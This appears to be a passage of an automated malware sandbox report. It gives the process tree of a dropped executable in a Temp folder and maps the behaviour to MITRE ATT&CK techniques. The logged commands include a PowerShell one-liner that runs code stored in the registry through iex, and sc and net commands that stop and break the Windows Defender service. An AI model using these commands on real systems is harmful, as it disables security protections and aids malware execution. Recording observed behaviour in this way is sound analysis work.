C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1548 -ip 1548
1⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:1392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3368 -ip 3368
1⤵
PID:5880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
1⤵
PID:3064
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:2028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:3844
- C:\Windows\SysWOW64\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  PID:5868
- C:\Windows\SysWOW64\net1.exe
  "C:\Windows\system32\net1.exe" stop windefend
  2⤵
  PID:5024
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
  2⤵
  - Launches sc.exe
  PID:5208

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery